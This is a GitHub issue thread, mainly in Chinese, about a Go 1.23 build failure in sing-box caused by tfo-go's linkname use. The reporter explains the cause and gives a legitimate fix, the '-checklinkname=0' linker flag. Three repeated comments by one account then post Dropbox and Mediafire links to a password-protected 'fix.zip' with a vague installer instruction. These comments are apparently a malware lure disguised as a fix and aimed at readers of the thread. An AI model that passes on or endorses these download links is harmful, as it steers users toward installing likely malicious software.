### ISSUE TITLE
关于 invalid reference to internal/poll.execIO 的解决方案

### ISSUE THREAD

**Issue by loafman-kangjun** [SagerNet/sing-box#2064]
### Operating system

Windows

### System version

go1.23.0 windows/amd64

### Description

在使用go 1.23.0编译sing-box时，我遇到了一个问题

# github.com/sagernet/sing-box/cmd/sing-box
link: github.com/sagernet/tfo-go: invalid reference to internal/poll.execIO
make: *** [makefile:20: build] Error 1

无论是否使用添加标签，我了解到，该问题似乎指向 tfo-go

通过对分叉源的查阅

### Windows support with Go 1.23 and later

`tfo-go`'s Windows support requires extensive usage of `//go:linkname` to access Go runtime internals, as there's currently no public API for Windows async IO in the standard library. Unfortunately, the Go team has decided to [lock down future uses of linkname](https://github.com/golang/go/issues/67401), starting with Go 1.23. And our bid to get the linknames we need exempted was [partially rejected](https://github.com/golang/go/issues/67401#issuecomment-2126175774). Therefore, we had to make the following changes:

- Windows support is gated behind the build tag `tfogo_checklinkname0` when building with Go 1.23 and later.
- With Go 1.21 and 1.22, `tfo-go` still provides full Windows support, with or without the build tag.
- With Go 1.23 and later, when the build tag is not specified, `tfo-go` only supports `listen` with TFO on Windows. To get full TFO support on Windows, the build tag `tfogo_checklinkname0` must be specified along with linker flag `-checklinkname=0` to disable the linkname check.

我发现了该问题的解决方法，你需要添加  -ldflags="-checklinkname=0"  标签
举例：go build -ldflags="-checklinkname=0" ./cmd/sing-box
记录以对任何在go1.23上源码出现问题的人提供帮助
可以作为对文档的补充

### Reproduction

克隆commit [9832932](https://github.com/SagerNet/sing-box/commit/983293246223887d03f0c9f17f5644f6b36d5615)
make 或 go 编译均可复现

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
